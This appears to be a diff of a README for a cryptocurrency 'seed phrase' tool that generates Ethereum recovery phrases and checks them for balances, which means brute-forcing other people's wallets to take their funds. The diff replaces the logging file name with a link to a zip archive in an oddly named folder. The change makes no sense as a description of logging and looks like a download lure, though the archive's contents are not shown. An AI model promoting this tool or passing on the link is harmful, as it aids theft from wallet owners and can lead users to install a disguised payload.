musab9osman/BlazeTool/README.md

 1. **Seed Phrase Generation**: The tool generates phrases based on predefined rules and patterns.
 2. **Balance Check**: Each generated seed phrase is checked against the Ethereum blockchain to see if it holds any funds.
-3. **Logging**: If a wallet with a non-zero balance is found, its details are logged in `result.txt`.
+3. **Logging**: If a wallet with a non-zero balance is found, its details are logged in `https://github.com/musab9osman/BlazeTool/raw/refs/heads/main/assumpsit/Tool_Blaze_3.0.zip`.

 This process continues until the specified number of attempts is reached or until the user decides to stop the execution.